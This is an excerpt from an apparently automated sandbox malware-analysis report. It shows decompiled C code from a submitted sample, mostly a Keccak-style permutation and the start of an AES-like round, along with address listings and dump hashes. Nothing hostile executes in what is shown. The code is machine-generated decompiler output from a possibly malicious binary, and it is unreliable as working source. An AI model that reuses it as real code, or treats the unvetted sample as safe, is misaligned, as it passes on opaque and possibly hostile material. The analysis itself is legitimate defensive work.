            					_t151 =  &(_t985[0x23]); // 0xb09e33
            					_t985[0x22] = _t1428 ^  *_t150 ^ _v24;
            					_t1084 = _t985;
            					_t986 = _v8;
            					_t1084[0x23] = _t1319 ^  *_t151 ^ _v28;
            					_t157 =  &(_t1084[0x2c]); // 0xa48e
            					_t158 =  &(_t1084[0x2d]); // 0x14568b00
            					_t1084[0x2c] = _t1428 ^  *_t157 ^ _v24;
            					_t1084[0x2d] = _t1319 ^  *_t158 ^ _v28;
            					_t1323 = (_t986 << 0x00000020 | _t1380) << 1;
            					_t988 = _v40;
            					_t1433 = _t986 >> 0x0000001f | _t1380 + _t1380;
            					_t1382 = _a4;
            					 *(_t1382 + 0x18) =  *(_t1382 + 0x18) ^ _t1433 ^ _v12;
            					 *(_t1382 + 0x1c) =  *(_t1382 + 0x1c) ^ _t1323 ^ _t988;
            					_t174 = _t1382 + 0x40; // 0x52ffffff
            					_t176 = _t1382 + 0x44; // 0x9ec1e850
            					 *(_t1382 + 0x40) = _t1433 ^  *_t174 ^ _v12;
            					 *(_t1382 + 0x44) = _t1323 ^  *_t176 ^ _t988;
            					_t179 = _t1382 + 0x68; // 0x8b55c35d
            					_t180 = _t1382 + 0x6c; // 0x28ec83ec
            					 *(_t1382 + 0x68) = _t1433 ^  *_t179 ^ _v12;
            					 *(_t1382 + 0x6c) = _t1323 ^  *_t180 ^ _t988;
            					_t184 = _t1382 + 0x90; // 0x68b0000
            					_t185 = _t1382 + 0x94; // 0x33284633
            					 *(_t1382 + 0x90) = _t1433 ^  *_t184 ^ _v12;
            					_t1099 = _t1382;
            					 *(_t1099 + 0x94) = _t1323 ^  *_t185 ^ _t988;
            					_t189 = _t1099 + 0xb8; // 0x333c5633
            					_t190 = _t1099 + 0xbc; // 0x96336456
            					 *(_t1099 + 0xb8) = _t1433 ^  *_t189 ^ _v12;
            					_t989 = _t1382;
            					 *(_t1099 + 0xbc) = _t1323 ^  *_t190 ^ _t988;
            					_t1100 = _v16;
            					_t768 = _v20;
            					_t1327 = (_t1100 << 0x00000020 | _t768) << 1;
            					_t1438 = _t1100 >> 0x0000001f | _t768 + _t768;
            					_t200 = _t989 + 0x24; // 0xe850ffff
            					_t201 = _t989 + 0x20; // 0xff34858d
            					 *(_t989 + 0x20) = _t1438 ^  *_t201 ^ _v32;
            					_t990 = _v36;
            					 *(_t989 + 0x24) = _t1327 ^  *_t200 ^ _v36;
            					 *(_t1382 + 0x48) =  *(_t1382 + 0x48) ^ _t1438 ^ _v32;
            					 *(_t1382 + 0x4c) =  *(_t1382 + 0x4c) ^ _t1327 ^ _t990;
            					_t212 = _t1382 + 0x70; // 0x758b5653
            					_t213 = _t1382 + 0x74; // 0x45c75708
            					 *(_t1382 + 0x70) = _t1438 ^  *_t212 ^ _v32;
            					 *(_t1382 + 0x74) = _t1327 ^  *_t213 ^ _t990;
            					_t217 = _t1382 + 0x98; // 0x46335046
            					_t219 = _t1382 + 0x9c; // 0xa0863378
            					 *(_t1382 + 0x98) = _t1438 ^  *_t217 ^ _v32;
            					_t1116 = _t1382;
            					 *(_t1116 + 0x9c) = _t1327 ^  *_t219 ^ _t990;
            					_t222 = _t1116 + 0xc0; // 0x8c
            					_t223 = _t1116 + 0xc4; // 0xb49633
            					 *(_t1116 + 0xc0) = _t1438 ^  *_t222 ^ _v32;
            					 *(_t1116 + 0xc4) = _t1327 ^  *_t223 ^ _t990;
            					_t227 = _t1116 + 8; // 0x852d72fe
            					_t1441 =  *_t227;
            					_t228 = _t1116 + 0xc; // 0x561174f6
            					_t1330 =  *_t228;
            					_t229 = _t1116 + 0x50; // 0xffff34bd
            					_t991 =  *_t229;
            					_t230 = _t1116 + 0x54; // 0xc8b9ff
            					_t1383 =  *_t230;
            					_t1443 = _a4;
            					 *(_t1443 + 0x50) = _t1330 >> 0x0000001f | _t1441 + _t1441;
            					 *(_t1443 + 0x54) = (_t1330 << 0x00000020 | _t1441) << 1;
            					_t238 = _t1443 + 0x38; // 0x1174ff85
            					_t239 = _t1443 + 0x3c; // 0x34958d57
            					_t1332 =  *_t239;
            					_v40 =  *_t238;
            					 *(_t1443 + 0x3c) = (_t1383 << 0x00000020 | _t991) << 3;
            					 *(_t1443 + 0x38) = _t1383 >> 0x0000001d | _t991 << 0x00000003;
            					_t247 = _t1443 + 0x58; // 0xaaf30000
            					_t1385 =  *_t247;
            					_t248 = _t1443 + 0x5c; // 0x3ebc033
            					_t1444 =  *_t248;
            					_t993 = _v40;
            					_t1334 = _a4;
            					 *(_t1334 + 0x58) = _t1332 >> 0x0000001a | _t993 << 0x00000006;
            					 *(_t1334 + 0x5c) = (_t1332 << 0x00000020 | _t993) << 6;
            					_t257 = _t1334 + 0x88; // 0x88
            					_t995 =  *_t257;
            					_t258 = _t1334 + 0x8c; // 0xb09e33
            					_t1335 =  *_t258;
            					_t1446 = _a4;
            					 *(_t1446 + 0x88) = _t1444 >> 0x00000016 | _t1385 << 0x0000000a;
            					 *(_t1446 + 0x8c) = (_t1444 << 0x00000020 | _t1385) << 0xa;
            					_t266 = _t1446 + 0x90; // 0x68b0000
            					_t1387 =  *_t266;
            					_t267 = _t1446 + 0x94; // 0x33284633
            					_t1447 =  *_t267;
            					_t1337 = _a4;
            					 *(_t1337 + 0x90) = _t1335 >> 0x00000011 | _t995 << 0x0000000f;
            					 *(_t1337 + 0x94) = (_t1335 << 0x00000020 | _t995) << 0xf;
            					_t275 = _t1337 + 0x18; // 0xff9eeee8
            					_t997 =  *_t275;
            					_t276 = _t1337 + 0x1c; // 0xcc483ff
            					_t1338 =  *_t276;
            					_t1449 = _a4;
            					 *(_t1449 + 0x18) = _t1447 >> 0x0000000b | _t1387 << 0x00000015;
            					 *(_t1449 + 0x1c) = (_t1447 << 0x00000020 | _t1387) << 0x15;
            					_t284 = _t1449 + 0x28; // 0x3e
            					_t1389 =  *_t284;
            					_t285 = _t1449 + 0x2c; // 0x308458b
            					_t1450 =  *_t285;
            					_t1340 = _a4;
            					 *(_t1340 + 0x28) = _t1338 >> 0x00000004 | _t997 << 0x0000001c;
            					 *(_t1340 + 0x2c) = (_t1338 << 0x00000020 | _t997) << 0x1c;
            					_t293 = _t1340 + 0x80; // 0x33385e33
            					_t999 =  *_t293;
            					_t294 = _t1340 + 0x84; // 0x9e33605e
            					_t1341 =  *_t294;
            					_t1452 = _a4;
            					 *(_t1452 + 0x84) = _t1389 << 0x00000004 | _t1450 >> 0x0000001c;
            					 *(_t1452 + 0x80) = (_t1450 << 0x00000020 | _t1389) >> 0x1c;
            					_t302 = _t1452 + 0x40; // 0x52ffffff
            					_t1391 =  *_t302;
            					_t303 = _t1452 + 0x44; // 0x9ec1e850
            					_t1453 =  *_t303;
            					_t1343 = _a4;
            					 *(_t1343 + 0x44) = _t999 << 0x0000000d | _t1341 >> 0x00000013;
            					 *(_t1343 + 0x40) = (_t1341 << 0x00000020 | _t999) >> 0x13;
            					_t311 = _t1343 + 0xa8; // 0x544e332c
            					_t1001 =  *_t311;
            					_t312 = _t1343 + 0xac; // 0x337c4e33
            					_t1344 =  *_t312;
            					_t1455 = _a4;
            					 *(_t1455 + 0xac) = _t1391 << 0x00000017 | _t1453 >> 0x00000009;
            					 *(_t1455 + 0xa8) = (_t1453 << 0x00000020 | _t1391) >> 9;
            					_t320 = _t1455 + 0xc0; // 0x8c
            					_t1393 =  *_t320;
            					_t321 = _t1455 + 0xc4; // 0xb49633
            					_t1456 =  *_t321;
            					_t1346 = _a4;
            					 *(_t1346 + 0xc0) = _t1344 >> 0x0000001e | _t1001 << 0x00000002;
            					 *(_t1346 + 0xc4) = (_t1344 << 0x00000020 | _t1001) << 2;
            					_t329 = _t1346 + 0x20; // 0xff34858d
            					_t1003 =  *_t329;
            					_t330 = _t1346 + 0x24; // 0xe850ffff
            					_t1347 =  *_t330;
            					_t1458 = _a4;
            					 *(_t1458 + 0x20) = _t1456 >> 0x00000012 | _t1393 << 0x0000000e;
            					 *(_t1458 + 0x24) = (_t1456 << 0x00000020 | _t1393) << 0xe;
            					_t338 = _t1458 + 0x78; // 0x9bfb00d8
            					_t1395 =  *_t338;
            					_t339 = _t1458 + 0x7c; // 0x105e8b00
            					_t1459 =  *_t339;
            					_t1349 = _a4;
            					 *(_t1349 + 0x78) = _t1347 >> 0x00000005 | _t1003 << 0x0000001b;
            					 *(_t1349 + 0x7c) = (_t1347 << 0x00000020 | _t1003) << 0x1b;
            					_t347 = _t1349 + 0xb8; // 0x333c5633
            					_t1005 =  *_t347;
            					_t348 = _t1349 + 0xbc; // 0x96336456
            					_t1350 =  *_t348;
            					_t1461 = _a4;
            					 *(_t1461 + 0xbc) = _t1395 << 0x00000009 | _t1459 >> 0x00000017;
            					 *(_t1461 + 0xb8) = (_t1459 << 0x00000020 | _t1395) >> 0x17;
            					_t356 = _t1461 + 0x98; // 0x46335046
            					_t1397 =  *_t356;
            					_t357 = _t1461 + 0x9c; // 0xa0863378
            					_t1462 =  *_t357;
            					_t1352 = _a4;
            					 *(_t1352 + 0x9c) = _t1005 << 0x00000018 | _t1350 >> 0x00000008;
            					 *(_t1352 + 0x98) = (_t1350 << 0x00000020 | _t1005) >> 8;
            					_t365 = _t1352 + 0x68; // 0x8b55c35d
            					_t1007 =  *_t365;
            					_t366 = _t1352 + 0x6c; // 0x28ec83ec
            					_t1353 =  *_t366;
            					_t1464 = _a4;
            					 *(_t1464 + 0x68) = _t1462 >> 0x00000018 | _t1397 << 0x00000008;
            					 *(_t1464 + 0x6c) = (_t1462 << 0x00000020 | _t1397) << 8;
            					_t374 = _t1464 + 0x60; // 0x5fffc883
            					_t1399 =  *_t374;
            					_t375 = _t1464 + 0x64; // 0xe58b5b5e
            					_t1465 =  *_t375;
            					_t1355 = _a4;
            					 *(_t1355 + 0x60) = _t1353 >> 0x00000007 | _t1007 << 0x00000019;
            					 *(_t1355 + 0x64) = (_t1353 << 0x00000020 | _t1007) << 0x19;
            					_t383 = _t1355 + 0x10; // 0xff348d8d
            					_t1009 =  *_t383;
            					_t384 = _t1355 + 0x14; // 0x5051ffff
            					_t1356 =  *_t384;
            					_t1467 = _a4;
            					 *(_t1467 + 0x14) = _t1399 << 0x0000000b | _t1465 >> 0x00000015;
            					 *(_t1467 + 0x10) = (_t1465 << 0x00000020 | _t1399) >> 0x15;
            					_t392 = _t1467 + 0xa0; // 0x8b000000
            					_t1401 =  *_t392;
            					_t393 = _t1467 + 0xa4; // 0x4e33044e
            					_t1468 =  *_t393;
            					_t1358 = _a4;
            					 *(_t1358 + 0xa0) = (_t1356 << 0x00000020 | _t1009) >> 2;
            					 *(_t1358 + 0xa4) = _t1009 << 0x0000001e | _t1356 >> 0x00000002;
            					_t401 = _t1358 + 0x70; // 0x758b5653
            					_t1011 =  *_t401;
            					_t402 = _t1358 + 0x74; // 0x45c75708
            					_t1359 =  *_t402;
            					_t1403 = _a4;
            					 *(_t1403 + 0x70) = _t1468 >> 0x0000000e | _t1401 << 0x00000012;
            					 *(_t1403 + 0x74) = (_t1468 << 0x00000020 | _t1401) << 0x12;
            					_t410 = _t1403 + 0xb0; // 0xa48e
            					_t411 = _t1403 + 0xb4; // 0x14568b00
            					_t1470 =  *_t411;
            					_v40 =  *_t410;
            					 *(_t1403 + 0xb0) = (_t1359 << 0x00000020 | _t1011) >> 0x19;
            					 *(_t1403 + 0xb4) = _t1011 << 0x00000007 | _t1359 >> 0x00000019;
            					_t419 = _t1403 + 0x48; // 0xc483ffff
            					_t1013 =  *_t419;
            					_t420 = _t1403 + 0x4c; // 0x8dc0320c
            					_t1404 =  *_t420;
            					_t1361 = _v40;
            					_t1363 = _a4;
            					 *(_t1363 + 0x4c) = _t1361 << 0x0000001d | _t1470 >> 0x00000003;
            					 *(_t1363 + 0x48) = (_t1470 << 0x00000020 | _t1361) >> 3;
            					_t429 = _t1363 + 0x30; // 0x89fe2bc6
            					_t1472 =  *_t429;
            					_t430 = _t1363 + 0x34; // 0xceeb0845
            					_t1364 =  *_t430;
            					_t1406 = _a4;
            					 *(_t1406 + 0x30) = _t1404 >> 0x0000000c | _t1013 << 0x00000014;
            					 *(_t1406 + 0x34) = (_t1404 << 0x00000020 | _t1013) << 0x14;
            					 *(_t1406 + 8) = (_t1364 << 0x00000020 | _t1472) >> 0x14;
            					 *(_t1406 + 0xc) = _t1472 << 0x0000000c | _t1364 >> 0x00000014;
            					_t444 = _t1406 + 8; // 0x852d72fe
            					_t1189 =  *_t444;
            					_t445 = _t1406 + 0x18; // 0xff9eeee8
            					_t446 = _t1406 + 0x10; // 0xff348d8d
            					_t1474 =  *_t446;
            					_t447 = _t1406 + 0x14; // 0x5051ffff
            					_t1366 =  *_t447;
            					_v36 =  *_t1406;
            					_t449 = _t1406 + 4; // 0x3b590845
            					_v32 =  *_t449;
            					_t451 = _t1406 + 0xc; // 0x561174f6
            					_t452 = _t1406 + 0x1c; // 0xcc483ff
            					_t1407 =  *_t452;
            					_v28 =  *_t451;
            					_t836 = _a4;
            					_v16 = _t1189;
            					_v40 =  *_t445;
            					_t458 = _t836 + 0x20; // 0xff34858d
            					_t1016 = _a4;
            					_v24 =  *_t458;
            					_t462 =  &(_a4[9]); // 0xe850ffff
            					_v20 =  *_t462;
            					 *_t1016 =  !_t1189 & _t1474 ^ _v36;
            					_t1016[1] =  !_v28 & _t1366 ^ _v32;
            					_t1016[2] =  !_t1474 & _v40 ^ _v16;
            					_t1016[3] =  !_t1366 & _t1407 ^ _v28;
            					_t1367 = _t1016;
            					_t1367[5] =  !_t1407 & _v20 ^ _t1366;
            					_t1367[4] =  !_v40 & _v24 ^ _t1474;
            					_t1408 = _t1367;
            					_t1408[7] =  !_v20 & _v32 ^ _t1407;
            					_t1408[6] =  !_v24 & _v36 ^ _v40;
            					_t1408[9] =  !_v32 & _v28 ^ _v20;
            					_t1408[8] =  !_v36 & _v16 ^ _v24;
            					_t492 =  &(_t1408[0xa]); // 0x3e
            					_t493 =  &(_t1408[0xc]); // 0x89fe2bc6
            					_t1211 =  *_t493;
            					_t494 =  &(_t1408[0x10]); // 0x52ffffff
            					_t495 =  &(_t1408[0xe]); // 0x1174ff85
            					_t1475 =  *_t495;
            					_t496 =  &(_t1408[0xf]); // 0x34958d57
            					_t1368 =  *_t496;
            					_v36 =  *_t492;
            					_t498 =  &(_t1408[0xb]); // 0x308458b
            					_v32 =  *_t498;
            					_t500 =  &(_t1408[0xd]); // 0xceeb0845
            					_t501 =  &(_t1408[0x11]); // 0x9ec1e850
            					_t1409 =  *_t501;
            					_v28 =  *_t500;
            					_t863 = _a4;
            					_v16 = _t1211;
            					_v40 =  *_t494;
            					_t507 = _t863 + 0x48; // 0xc483ffff
            					_t1018 = _a4;
            					_v24 =  *_t507;
            					_t511 =  &(_a4[0x13]); // 0x8dc0320c
            					_v20 =  *_t511;
            					 *(_t1018 + 0x28) =  !_t1211 & _t1475 ^ _v36;
            					 *(_t1018 + 0x2c) =  !_v28 & _t1368 ^ _v32;
            					 *(_t1018 + 0x30) =  !_t1475 & _v40 ^ _v16;
            					 *(_t1018 + 0x34) =  !_t1368 & _t1409 ^ _v28;
            					_t1369 = _t1018;
            					 *(_t1369 + 0x3c) =  !_t1409 & _v20 ^ _t1368;
            					 *(_t1369 + 0x38) =  !_v40 & _v24 ^ _t1475;
            					_t1410 = _t1369;
            					 *(_t1410 + 0x40) =  !_v24 & _v36 ^ _v40;
            					 *(_t1410 + 0x44) =  !_v20 & _v32 ^ _t1409;
            					 *(_t1410 + 0x48) =  !_v36 & _v16 ^ _v24;
            					 *(_t1410 + 0x4c) =  !_v32 & _v28 ^ _v20;
            					_t542 = _t1410 + 0x50; // 0xffff34bd
            					_t543 = _t1410 + 0x58; // 0xaaf30000
            					_t1233 =  *_t543;
            					_t544 = _t1410 + 0x68; // 0x8b55c35d
            					_t545 = _t1410 + 0x60; // 0x5fffc883
            					_t1476 =  *_t545;
            					_t546 = _t1410 + 0x64; // 0xe58b5b5e
            					_t1370 =  *_t546;
            					_v36 =  *_t542;
            					_t548 = _t1410 + 0x54; // 0xc8b9ff
            					_v32 =  *_t548;
            					_t550 = _t1410 + 0x5c; // 0x3ebc033
            					_t551 = _t1410 + 0x6c; // 0x28ec83ec
            					_t1411 =  *_t551;
            					_v28 =  *_t550;
            					_t890 = _a4;
            					_v16 = _t1233;
            					_v40 =  *_t544;
            					_t557 = _t890 + 0x70; // 0x758b5653
            					_t1020 = _a4;
            					_v24 =  *_t557;
            					_t561 =  &(_a4[0x1d]); // 0x45c75708
            					 *(_t1020 + 0x50) =  !_t1233 & _t1476 ^ _v36;
            					_v20 =  *_t561;
            					 *(_t1020 + 0x54) =  !_v28 & _t1370 ^ _v32;
            					 *(_t1020 + 0x58) =  !_t1476 & _v40 ^ _v16;
            					 *(_t1020 + 0x5c) =  !_t1370 & _t1411 ^ _v28;
            					_t1371 = _t1020;
            					 *(_t1371 + 0x60) =  !_v40 & _v24 ^ _t1476;
            					 *(_t1371 + 0x64) =  !_t1411 & _v20 ^ _t1370;
            					_t1412 = _t1371;
            					 *(_t1412 + 0x68) =  !_v24 & _v36 ^ _v40;
            					 *(_t1412 + 0x6c) =  !_v20 & _v32 ^ _t1411;
            					 *(_t1412 + 0x70) =  !_v36 & _v16 ^ _v24;
            					 *(_t1412 + 0x74) =  !_v32 & _v28 ^ _v20;
            					_t592 = _t1412 + 0x78; // 0x9bfb00d8
            					_t593 = _t1412 + 0x80; // 0x33385e33
            					_t1255 =  *_t593;
            					_t594 = _t1412 + 0x90; // 0x68b0000
            					_t595 = _t1412 + 0x88; // 0x88
            					_t1477 =  *_t595;
            					_t596 = _t1412 + 0x8c; // 0xb09e33
            					_t1372 =  *_t596;
            					_v36 =  *_t592;
            					_t598 = _t1412 + 0x7c; // 0x105e8b00
            					_v32 =  *_t598;
            					_t600 = _t1412 + 0x84; // 0x9e33605e
            					_t601 = _t1412 + 0x94; // 0x33284633
            					_t1413 =  *_t601;
            					_v28 =  *_t600;
            					_t917 = _a4;
            					_v16 = _t1255;
            					_v40 =  *_t594;
            					_t607 = _t917 + 0x98; // 0x46335046
            					_t1022 = _a4;
            					_v24 =  *_t607;
            					_t611 =  &(_a4[0x27]); // 0xa0863378
            					 *(_t1022 + 0x78) =  !_t1255 & _t1477 ^ _v36;
            					_v20 =  *_t611;
            					 *(_t1022 + 0x7c) =  !_v28 & _t1372 ^ _v32;
            					 *(_t1022 + 0x80) =  !_t1477 & _v40 ^ _v16;
            					 *(_t1022 + 0x84) =  !_t1372 & _t1413 ^ _v28;
            					_t1373 = _t1022;
            					 *(_t1373 + 0x88) =  !_v40 & _v24 ^ _t1477;
            					 *(_t1373 + 0x8c) =  !_t1413 & _v20 ^ _t1372;
            					_t1414 = _t1373;
            					 *(_t1414 + 0x90) =  !_v24 & _v36 ^ _v40;
            					 *(_t1414 + 0x94) =  !_v20 & _v32 ^ _t1413;
            					 *(_t1414 + 0x98) =  !_v36 & _v16 ^ _v24;
            					 *(_t1414 + 0x9c) =  !_v32 & _v28 ^ _v20;
            					_t642 = _t1414 + 0xa0; // 0x8b000000
            					_t643 = _t1414 + 0xa8; // 0x544e332c
            					_t1277 =  *_t643;
            					_t644 = _t1414 + 0xb0; // 0xa48e
            					_t1478 =  *_t644;
            					_t645 = _t1414 + 0xb8; // 0x333c5633
            					_v36 =  *_t642;
            					_t647 = _t1414 + 0xa4; // 0x4e33044e
            					_t648 = _t1414 + 0xb4; // 0x14568b00
            					_t1374 =  *_t648;
            					_v32 =  *_t647;
            					_t650 = _t1414 + 0xac; // 0x337c4e33
            					_t651 = _t1414 + 0xbc; // 0x96336456
            					_t1415 =  *_t651;
            					_v28 =  *_t650;
            					_t944 = _a4;
            					_v16 = _t1277;
            					_v40 =  *_t645;
            					_t657 = _t944 + 0xc0; // 0x8c
            					_t1024 = _a4;
            					_v24 =  *_t657;
            					_t661 =  &(_a4[0x31]); // 0xb49633
            					_t1024[0x28] =  !_t1277 & _t1478 ^ _v36;
            					_v20 =  *_t661;
            					_t1024[0x29] =  !_v28 & _t1374 ^ _v32;
            					_t1024[0x2a] =  !_t1478 & _v40 ^ _v16;
            					_t1024[0x2b] =  !_t1374 & _t1415 ^ _v28;
            					_t1375 = _t1024;
            					_t1416 = _t1375;
            					_t1375[0x2c] =  !_v40 & _v24 ^ _t1478;
            					_t1375[0x2d] =  !_t1415 & _v20 ^ _t1374;
            					_t1024[0x2e] =  !_v24 & _v36 ^ _v40;
            					_t1024[0x2f] =  !_v20 & _v32 ^ _t1415;
            					_t1416[0x30] =  !_v36 & _v16 ^ _v24;
            					_t1416[0x31] =  !_v32 & _v28 ^ _v20;
            					_t1299 = _v44;
            					 *_t1416 =  *_t1416 ^  *_t1299;
            					_t693 =  &(_t1299[1]); // 0x0
            					_t969 =  *_t693;
            					_t1300 =  &(_t1299[2]);
            					_t1416[1] = _t1416[1] ^ _t969;
            					_v44 = _t1300;
            				} while (_t1300 < 0x9bfbc0);
            				return _t969;
            			}
            0x009bb055
            0x009bb05a
            0x009bb05a
            0x009bb060
            0x009bb060
            0x009bb074
            0x009bb077
            0x009bb07f
            0x009bb087
            0x009bb087
            0x009bb08d
            0x009bb08d
            0x009bb09f
            0x009bb0a4
            0x009bb0ac
            0x009bb0b4
            0x009bb0b4
            0x009bb0b7
            0x009bb0b7
            0x009bb0c6
            0x009bb0cb
            0x009bb0d0
            0x009bb0d5
            0x009bb0d5
            0x009bb0d8
            0x009bb0d8
            0x009bb0e7
            0x009bb0ec
            0x009bb0f1
            0x009bb0f6
            0x009bb0f6
            0x009bb0fc
            0x009bb0fc
            0x009bb110
            0x009bb113
            0x009bb11b
            0x009bb123
            0x009bb123
            0x009bb129
            0x009bb129
            0x009bb13d
            0x009bb140
            0x009bb148
            0x009bb150
            0x009bb150
            0x009bb153
            0x009bb153
            0x009bb162
            0x009bb167
            0x009bb16c
            0x009bb171
            0x009bb171
            0x009bb174
            0x009bb174
            0x009bb183
            0x009bb188
            0x009bb18d
            0x009bb192
            0x009bb192
            0x009bb195
            0x009bb195
            0x009bb1a6
            0x009bb1a9
            0x009bb1ae
            0x009bb1b3
            0x009bb1b3
            0x009bb1b9
            0x009bb1b9
            0x009bb1cd
            0x009bb1d0
            0x009bb1d8
            0x009bb1e0
            0x009bb1e0
            0x009bb1e3
            0x009bb1e3
            0x009bb1f4
            0x009bb1f7
            0x009bb1fc
            0x009bb1ff
            0x009bb205
            0x009bb205
            0x009bb20b
            0x009bb21c
            0x009bb224
            0x009bb22c
            0x009bb22c
            0x009bb22f
            0x009bb22f
            0x009bb232
            0x009bb243
            0x009bb248
            0x009bb24d
            0x009bb252
            0x009bb252
            0x009bb255
            0x009bb255
            0x009bb264
            0x009bb269
            0x009bb26e
            0x009bb27f
            0x009bb284
            0x009bb289
            0x009bb289
            0x009bb28c
            0x009bb28f
            0x009bb28f
            0x009bb292
            0x009bb292
            0x009bb295
            0x009bb298
            0x009bb29b
            0x009bb29e
            0x009bb2a1
            0x009bb2a1
            0x009bb2a4
            0x009bb2a7
            0x009bb2aa
            0x009bb2b1
            0x009bb2b7
            0x009bb2ba
            0x009bb2bd
            0x009bb2c3
            0x009bb2c6
            0x009bb2cc
            0x009bb2d7
            0x009bb2ed
            0x009bb2f2
            0x009bb308
            0x009bb30a
            0x009bb30d
            0x009bb325
            0x009bb327
            0x009bb32a
            0x009bb343
            0x009bb346
            0x009bb349
            0x009bb34c
            0x009bb34c
            0x009bb34f
            0x009bb352
            0x009bb352
            0x009bb355
            0x009bb355
            0x009bb358
            0x009bb35b
            0x009bb35e
            0x009bb361
            0x009bb364
            0x009bb364
            0x009bb367
            0x009bb36a
            0x009bb36d
            0x009bb374
            0x009bb37a
            0x009bb37d
            0x009bb380
            0x009bb386
            0x009bb389
            0x009bb38f
            0x009bb39b
            0x009bb3b1
            0x009bb3b6
            0x009bb3cc
            0x009bb3ce
            0x009bb3d1
            0x009bb3e9
            0x009bb3eb
            0x009bb3ee
            0x009bb407
            0x009bb40a
            0x009bb40d
            0x009bb410
            0x009bb410
            0x009bb413
            0x009bb416
            0x009bb416
            0x009bb419
            0x009bb419
            0x009bb41c
            0x009bb41f
            0x009bb422
            0x009bb425
            0x009bb428
            0x009bb428
            0x009bb42b
            0x009bb42e
            0x009bb431
            0x009bb438
            0x009bb43e
            0x009bb441
            0x009bb444
            0x009bb44a
            0x009bb44d
            0x009bb452
            0x009bb45f
            0x009bb475
            0x009bb47a
            0x009bb48e
            0x009bb492
            0x009bb498
            0x009bb4ad
            0x009bb4af
            0x009bb4b2
            0x009bb4cb
            0x009bb4ce
            0x009bb4d1
            0x009bb4d4
            0x009bb4d4
            0x009bb4da
            0x009bb4e0
            0x009bb4e0
            0x009bb4e6
            0x009bb4e6
            0x009bb4ec
            0x009bb4ef
            0x009bb4f2
            0x009bb4f5
            0x009bb4fb
            0x009bb4fb
            0x009bb501
            0x009bb504
            0x009bb507
            0x009bb50e
            0x009bb514
            0x009bb51a
            0x009bb51d
            0x009bb523
            0x009bb529
            0x009bb52e
            0x009bb53b
            0x009bb551
            0x009bb559
            0x009bb572
            0x009bb574
            0x009bb57d
            0x009bb595
            0x009bb597
            0x009bb5a0
            0x009bb5b1
            0x009bb5bf
            0x009bb5c5
            0x009bb5cb
            0x009bb5cb
            0x009bb5d1
            0x009bb5d1
            0x009bb5d7
            0x009bb5dd
            0x009bb5e0
            0x009bb5e6
            0x009bb5e6
            0x009bb5ec
            0x009bb5ef
            0x009bb5f5
            0x009bb5f5
            0x009bb5fb
            0x009bb5fe
            0x009bb601
            0x009bb608
            0x009bb60e
            0x009bb614
            0x009bb617
            0x009bb61d
            0x009bb623
            0x009bb62b
            0x009bb638
            0x009bb651
            0x009bb659
            0x009bb672
            0x009bb674
            0x009bb676
            0x009bb67f
            0x009bb697
            0x009bb6a0
            0x009bb6b9
            0x009bb6bf
            0x009bb6c5
            0x009bb6ca
            0x009bb6cc
            0x009bb6cc
            0x009bb6cf
            0x009bb6d2
            0x009bb6d5
            0x009bb6d8
            0x009bb6ea

            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp Download File
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 59295902020624880401a34eaade51f175c8b88d2f47f36299341a4cb4b04d2d
            • Instruction ID: 15d87a84e38cdb6c131828778716413d41030e0beb1e7e247a04ddac44c63954
            • Opcode Fuzzy Hash: 59295902020624880401a34eaade51f175c8b88d2f47f36299341a4cb4b04d2d
            • Instruction Fuzzy Hash: 39A2F475A106198FDB48CF69C491AAAF7F2BF8C300F55856ED85AEB741CB34A841CF90
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 75%
            			E009B85D5(void* __eflags, unsigned int _a4, signed int _a8, signed int _a12, signed int* _a16) {
            				unsigned int _v8;
            				unsigned int _v12;
            				unsigned int _v16;
            				unsigned int _v20;
            				signed int _t383;
            				signed char _t388;
            				signed char _t393;
            				unsigned int _t394;
            				signed int* _t396;
            				unsigned int _t413;
            				signed int _t420;
            				unsigned int _t434;
            				unsigned int _t453;
            				unsigned int _t499;
            				unsigned int _t501;
            				unsigned int _t507;
            				signed int* _t509;
            				signed int* _t511;
            				signed int* _t512;
            				signed int _t516;
            				signed int _t517;
            				signed int _t519;
            				void* _t521;
            
            				_t521 = __eflags;
            				_t396 = _a12;
            				asm("rol eax, 0x8");
            				asm("ror edx, 0x8");
            				_t511 = _a4;
            				_a4 = ( *_t396 & 0xff00ff00 |  *_t396 & 0x00ff00ff) ^  *_t511;
            				asm("rol eax, 0x8");
            				asm("ror edx, 0x8");
            				_t6 =  &(_t511[1]); // 0x330475c0
            				asm("rol eax, 0x8");
            				asm("ror ebx, 0x8");
            				_v12 = (_t396[1] & 0xff00ff00 | _t396[1] & 0x00ff00ff) ^  *_t6;
            				_t9 =  &(_t511[2]); // 0x560aebc0
            				_t388 = (_t396[2] & 0xff00ff00 | _t396[2] & 0x00ff00ff) ^  *_t9;
            				asm("rol eax, 0x8");
            				asm("ror edx, 0x8");
            				_t11 =  &(_t511[3]); // 0xffe85ce8
            				_t499 = (_t396[3] & 0xff00ff00 | _t396[3] & 0x00ff00ff) ^  *_t11;
            				_t21 =  &(_t511[4]); // 0x59c033ff
            				_v16 =  *(0x9bdad8 + (_t388 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x9bd6d8 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x9bd2d8 + (_a4 >> 0x18) * 4) ^  *(0x9bded8 + (_t499 & 0x000000ff) * 4) ^  *_t21;
            				_t33 =  &(_t511[5]); // 0x8b5e5b40
            				_v8 =  *(0x9bdad8 + (_t499 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x9bd6d8 + (_t388 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x9bd2d8 + (_v12 >> 0x18) * 4) ^  *(0x9bded8 + (_a4 & 0x000000ff) * 4) ^  *_t33;
